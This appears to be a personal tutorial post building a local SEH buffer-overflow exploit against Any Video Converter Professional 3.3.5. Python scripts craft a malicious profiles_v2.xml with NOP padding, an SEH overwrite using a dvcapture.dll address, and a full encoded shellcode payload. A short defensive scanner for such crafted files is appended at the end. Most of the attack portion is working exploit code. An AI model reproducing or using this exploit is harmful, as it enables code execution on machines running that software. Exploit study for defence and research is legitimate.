Thanks for reading my scribbled notes. In this part I explore a local SEH buffer overflow in Any Video Converter Professional (3.3.5), looking at the files in its Program Files folder. Let's start the journey:
**I modify the file profiles_v2.xml using a fuzzer as the container. This is my structure:
```xml
<root>
<categories>
<category name="all" id="0" icon="cat_all.bmp" desc="buffer"/>
</categories>
<groups></groups>
<profiles></profiles></root>
```
**In the buffer I replace the value with the junk character \x41 repeated 1000 times, and create the fuzzer with Python.
```python
#!/usr/bin/python
# Write a profiles_v2.xml whose desc attribute holds 1000 'A' (\x41) bytes
fuzzfile = "profiles_v2.xml"
buffer = b"\x41" * 1000
# Same layout as the original file, with the desc value replaced by the junk
junk = b"<root>\n"
junk += b"<categories>\n"
junk += b'<category name="all" id="0" icon="cat_all.bmp" desc="' + buffer + b'"/>\n'
junk += b"</categories>\n"
junk += b"<groups></groups>\n<profiles></profiles>\n</root>\n"
# Binary mode so every byte is written unchanged
with open(fuzzfile, "wb") as f:
    f.write(junk)
print("File " + fuzzfile + " successfully created ........")
```
==> this creates the file ==> profiles_v2.xml
**Run the fuzzer and replace the file profiles_v2.xml in the any vide.... directory
==> The fuzzer has an effect
==> The SEH chain contains the characters 41414141
==> Shift + F9 ==> yeah... EIP is overwritten with 41414141
**Create a pattern, modify the fuzzer with it, run it and replace the .xml file again
==> see the SEH chain
==> Shift + F9
** Check the pattern offset of EIP ==> 316C4130 ==> 332 (offset)
** Like yesterday, modify the fuzzer with a JUMP SHORT and a dll address; I use dvcapture.dll
==> dvcapture.dll address ==> \x33\xE6\x01\x10 (little endian)
**Modified fuzzer
```python
#!/usr/bin/python
# Fuzzer adjusted to the offsets found above: 328 bytes of NOP (\x90) padding,
# then the nSEH and SEH values (still commented out at this step)
fuzzfile = "profiles_v2.xml"
buffer = b"\x90" * 328
#buffer += b"\xcc\xcc\xcc\xcc"   # nSEH at offset 328
#buffer += b"\x33\xE6\x01\x10"   # SEH at offset 332: address in dvcapture.dll, little endian
junk = b"<root>\n"
junk += b"<categories>\n"
junk += b'<category name="all" id="0" icon="cat_all.bmp" desc="' + buffer + b'"/>\n'
junk += b"</categories>\n"
junk += b"<groups></groups>\n<profiles></profiles>\n</root>\n"
# Binary mode so every byte is written unchanged
with open(fuzzfile, "wb") as f:
    f.write(junk)
print("File " + fuzzfile + " successfully created ........")
```
** Generate the shellcode, modify the fuzzer and replace the .xml file again with the newest fuzzer output.
==> bad characters ==> 00 0a 0d 22 26 3e
```python
#!/usr/bin/python
# Final fuzzer: 328 bytes of NOP padding, nSEH, SEH (dvcapture.dll address),
# then the generated shellcode (bad characters 00 0a 0d 22 26 3e excluded)
fuzzfile = "profiles_v2.xml"
buffer = b"\x90" * 328
buffer += b"\xcc\xcc\xcc\xcc"   # nSEH at offset 328
buffer += b"\x33\xE6\x01\x10"   # SEH at offset 332: address in dvcapture.dll, little endian
# shellcode
buffer += (b"\xb8\xb8\x0c\x2f\x1f\x2b\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x51\x5a"
b"\x31\x42\x10\x03\x42\x10\x83\x7a\x08\xcd\xea\x86\x7b\xfa\x58\x9e"
b"\x85\x03\x9d\xa1\x16\x77\x0e\x79\xf3\x0c\x8a\xbd\x70\x6e\x10\xc5"
b"\x87\x60\x91\x7a\x90\xf5\xf9\xa4\xa1\xe2\x4f\x2f\x95\x7f\x4e\xc1"
b"\xe7\xbf\xc8\xb1\x8c\x80\x9f\xce\x4d\xca\x6d\xd1\x8f\x20\x99\xea"
b"\x5b\x93\x4a\x79\x81\x50\xd5\xa5\x48\x8c\x8c\x2e\x46\x19\xda\x6f"
b"\x4b\x9c\x37\x8c\x5f\x15\x4e\xfe\xbb\x35\x30\x3d\xf2\x9e\xd6\x4a"
b"\xb6\x10\x9c\x0c\x35\xda\xd2\x90\xe8\x57\x52\xa0\xac\x0f\xdd\xfe"
b"\x5e\x3c\xb1\x01\x88\xda\x61\x9b\x5d\x10\xb4\x0b\xe9\x25\x8a\x94"
b"\x41\x35\x3a\x42\xa1\x24\x47\xa9\x65\x48\x6e\x92\x0c\x53\xe9\xad"
b"\xe2\x94\xf4\xf8\x96\xa6\x07\xd2\x0f\x7e\xfe\x27\x62\xd7\xfe\x11"
b"\x2e\x8b\x53\xce\x82\x68\x07\xb3\x77\x90\x77\x55\x10\x7f\x24\xff"
b"\xb3\xf6\x35\x6a\x5b\xad\xac\xe4\x5b\xfa\x2f\xd2\x0e\x15\x81\x8f"
b"\x31\xc5\x49\x8b\x63\xc8\x60\x84\x84\xc3\x20\x7f\x84\x3c\xae\x9a"
b"\x33\x3b\x66\x33\x3b\x95\x29\xef\x97\x4f\x35\xdf\x8b\x18\x2e\xa6"
b"\x6d\xa1\xe7\xa7\xa4\x07\xf7\x87\x2f\xc2\x63\x41\xd8\x71\x01\x04"
b"\xfd\x1c\x89\x4f\xd7\x2c\xa0\x88\x4d\xe9\x3a\xb4\xa3\x31\xcf\x92"
b"\x3a\xf3\x1d\x1c\x80\xd8\xce\x6d\x7f\x19\x5a\xc6\x2b\x31\xee\xe6"
b"\x9f\xd4\xf1\x63\xa4\x27\xdb\xd0\x73\x8a\xb5\xb7\x2a\x40\x37\x66"
b"\x9c\xc1\x66\x77\xce\x82\x25\x5e\xea\x9c\x65\x9f\x23\x4a\x75\xa0"
b"\xfb\x74\x59\xd5\x53\x77\xd9\x2d\x3f\x78\x08\xff\x3f\x56\xdd\x0f"
b"\x35\x53\x41\xbc\xb5\x8a\x82\x92")
junk = b"<root>\n"
junk += b"<categories>\n"
junk += b'<category name="all" id="0" icon="cat_all.bmp" desc="' + buffer + b'"/>\n'
junk += b"</categories>\n"
junk += b"<groups></groups>\n<profiles></profiles>\n</root>\n"
# Binary mode so every byte is written unchanged
with open(fuzzfile, "wb") as f:
    f.write(junk)
print("File " + fuzzfile + " successfully created ........")
```
** Execute the program with the .xml file containing the payload
== DONE ==
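A defender-side check, added here as an example and not part of the original post: a small scanner that flags a profiles_v2.xml whose attribute values are oversized, contain non-printable bytes, or carry a NOP sled, which is what a crafted desc value like the one above looks like on disk. The thresholds and the build_sample helper are my assumptions; the sample file layout is constructed to match the structure shown above.

```python
import re

MAX_ATTR_LEN = 256    # assumed sane upper bound for any attribute value in this file
NOP_SLED_MIN = 16     # a run of this many \x90 bytes is treated as a sled

# Attribute values in the file are plain name="value" pairs
ATTR_RE = re.compile(rb'(\w+)="([^"]*)"')


def scan_profiles_xml(data):
    """Return (attribute name, reason) findings for suspicious attribute values."""
    findings = []
    for name, value in ATTR_RE.findall(data):
        name = name.decode("ascii")
        if len(value) > MAX_ATTR_LEN:
            findings.append((name, "length %d exceeds %d" % (len(value), MAX_ATTR_LEN)))
        # A legitimate desc value is printable ASCII; shellcode and addresses are not
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((name, "non-printable bytes"))
        if b"\x90" * NOP_SLED_MIN in value:
            findings.append((name, "NOP sled"))
    return findings


def build_sample(desc):
    """Constructed profiles_v2.xml body in the layout the post shows (desc is bytes)."""
    return (b"<root>\n<categories>\n"
            b'<category name="all" id="0" icon="cat_all.bmp" desc="' + desc + b'"/>\n'
            b"</categories>\n<groups></groups>\n<profiles></profiles>\n</root>\n")


def scan_file(path):
    """Scan a profiles_v2.xml on disk, reading it as raw bytes."""
    with open(path, "rb") as f:
        return scan_profiles_xml(f.read())


if __name__ == "__main__":
    # Constructed inputs: the benign layout, and one padded the way the post describes
    print(scan_profiles_xml(build_sample(b"buffer")))
    crafted = build_sample(b"\x90" * 328 + b"\xcc" * 4 + b"\x33\xE6\x01\x10")
    for name, reason in scan_profiles_xml(crafted):
        print("%s: %s" % (name, reason))
```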